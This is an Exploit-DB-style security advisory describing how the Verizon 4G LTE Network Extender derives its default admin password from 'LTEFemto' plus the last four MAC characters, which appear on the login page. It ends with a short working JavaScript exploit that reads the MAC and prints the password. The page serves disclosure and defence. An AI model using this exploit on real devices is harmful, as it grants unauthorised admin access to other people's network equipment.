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Verizon 4G LTE Network Extender
by:
LiquidWorm
7.5
CVSS
HIGH
Weak Credentials Algorithm
798
CWE
Product Name: Verizon 4G LTE Network Extender
Affected Version From: GA4.38
Affected Version To: V0.4.038.2131
Patch Exists: NO
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Platforms Tested: lighttpd-web
2022

Verizon 4G LTE Network Extender – Weak Credentials Algorithm

Verizon's 4G LTE Network Extender is utilizing a weak default admin password generation algorithm. The password is generated using the last 4 values from the device's MAC address, which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string 'LTEFemto' resulting in something like 'LTEFemtoD080' as the default Admin password.

Mitigation:

Verizon should implement a stronger algorithm for generating default admin passwords and ensure that they are not easily guessable. Users should also be encouraged to change their default passwords upon installation.
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Exploit-DB raw data:

Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm


Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131

Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.

Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.

Tested on: lighttpd-web


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php


17.02.2022

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snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//

console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;

const doAjax = async () => {
  const resp = await fetch(def);
  if (resp.ok) {
    const jsonyo = await resp.json();
    return Promise.resolve(jsonyo);
  } else {
    return Promise.reject("Smth not rite captain!");
  }
}
doAjax().then(console.log).catch(console.log);

await new Promise(t => setTimeout(t, 1337));

console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));